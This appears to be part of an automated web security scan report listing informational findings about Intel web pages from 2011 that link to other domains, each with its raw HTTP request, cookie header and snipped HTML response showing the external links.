17.88. http://www.intel.com/en_PH/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_PH/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/en_PH/index.htm?iid=gg_en_PH+noscript
The response contains the following link to another domain:
  • http://www.facebook.com/IntelPhilippines

Request

GET /en_PH/index.htm?iid=gg_en_PH+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:01 GMT
Content-Length: 22989
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-
...[SNIP]...
<div class="marquee-container">
       <a href="http://www.facebook.com/IntelPhilippines" onclick="var s='s_gs()'; waCustomLink(this,'facebook_ph','e','wa_iid=home-ph+facebook');" target="_blank">
<img src="/en_PH/pix/eng_764x150.jpg" alt="Make my mod win a cool custom-designed,custom-built desktop PC case mod! Enter here" title="Make my mod win a cool custom-designed,custom-built desktop PC c
...[SNIP]...

17.89. http://www.intel.com/en_SA/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_SA/consumer/products/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/en_SA/consumer/products/processors/index.htm?iid=gg_en_EG+noscript
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/index.cfm?iid=ftr-enSA+invrel

Request

GET /en_SA/consumer/products/processors/index.htm?iid=gg_en_EG+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39045


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-SA" lang="en-SA">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/sites/sitewide/ump/css/mod-ump.css" />
<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<a href="javascript:void(window.open('http://www.adobe.com/go/getflashplayer'));">
                                               <img alt="Get Adobe Flash player" border="0" src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" /></a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-enSA+invrel">Investor Relations</a>
...[SNIP]...

17.90. http://www.intel.com/en_US/worldwide.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_US/worldwide.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/en_US/worldwide.htm?iid=hdr+location
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /en_US/worldwide.htm?iid=hdr+location HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:17:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Intel World
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.91. http://www.intel.com/espanol/business/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /espanol/business/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/espanol/business/index.htm?iid=gg_es_AR+noscript
The response contains the following links to other domains:
  • http://www.dialogoti.com/
  • http://www.intc.com/index.cfm?iid=ftr-LA+invrel

Request

GET /espanol/business/index.htm?iid=gg_es_AR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="es-MX">
<head>
<meta http-equiv=Content-Type content="text/html; charset=UTF-8">
...[SNIP]...
<li><a href="http://www.dialogoti.com" target="_blank">Di&aacute;logo TI Destacado: Entrenamientos de TI y m..s</a>
...[SNIP]...
<p>
                   <a href="http://www.dialogoti.com" target="_blank">Di&aacute;logo TI Destacado</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-LA+invrel">Relaciones con inversores</a>
...[SNIP]...

17.92. http://www.intel.com/feedback.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /feedback.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/feedback.htm?iid=ftr+contact
The response contains the following links to other domains:
  • http://intc.client.shareholder.com/
  • http://server.iad.liveperson.net/hc/s-77025620/cmd/kbresource/kb-5483971040643969873/front_page!PAGETYPE?VisitorProfile=Corporate&category=1
  • http://www.classmatepc.com/
  • http://www.classmatepc.com/contact/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /feedback.htm?iid=ftr+contact HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:45 GMT
Content-Length: 31921
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Contact Us: Intel.com</title>
<meta http-equiv
...[SNIP]...
<li><a href="http://www.classmatepc.com" target="_blank" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intelfb+body_classpc');">Classmate PC</a>
...[SNIP]...
<li><a href="http://intc.client.shareholder.com" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intelfb+body_investor');">Investor Relations</a>
...[SNIP]...
<li><a href="http://server.iad.liveperson.net/hc/s-77025620/cmd/kbresource/kb-5483971040643969873/front_page!PAGETYPE?VisitorProfile=Corporate&category=1" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intelfb+body_faq');">Company FAQs</a>
...[SNIP]...
<li><a href="http://www.classmatepc.com/contact/" target="_blank" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intelfb+rhc_classpc');"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.93. http://www.intel.com/fr_CA/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /fr_CA/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/fr_CA/index.htm?iid=gg_fr_CA+noscript
The response contains the following links to other domains:
  • http://integration.ironhorseinteractive.com/pages/intel_ca_fr.html
  • http://www.greatcomputing.ca/index_fr.php
  • http://www.intc.com/index.cfm?iid=ftr-FR+invrel
  • http://www.lesaffaires.com/industrie/technologies.fr.html
  • http://www.zenentreprise.com/

Request

GET /fr_CA/index.htm?iid=gg_fr_CA+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Content-Length: 26344
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="fr-CA">
<head>
<meta http-equiv="content-type" content="text/html; charset
...[SNIP]...
<li><a href="http://www.greatcomputing.ca/index_fr.php" target="_blank"><strong>
...[SNIP]...
<li><a href="http://www.zenentreprise.com" target="_blank"><strong>
...[SNIP]...
<li><a href="http://integration.ironhorseinteractive.com/pages/intel_ca_fr.html" target="_blank">Points de vente</a>
...[SNIP]...
<li><a href="http://www.lesaffaires.com/industrie/technologies.fr.html" target="_blank">Communaut..s/Blogues</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-FR+invrel">Investisseurs</a>
...[SNIP]...

17.94. http://www.intel.com/idf/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /idf/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/idf/index.htm?iid=subhdr+devctr_idf
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /idf/index.htm?iid=subhdr+devctr_idf HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Attend The
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.95. http://www.intel.com/intel/companyinfo/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /intel/companyinfo/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
The response contains the following links to other domains:
  • http://www.intc.com/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /intel/companyinfo/index.htm?iid=subhdr+info HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:14 GMT
Content-Length: 25926
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel's Corporate Values and Vision.</title>
   
   <met
...[SNIP]...
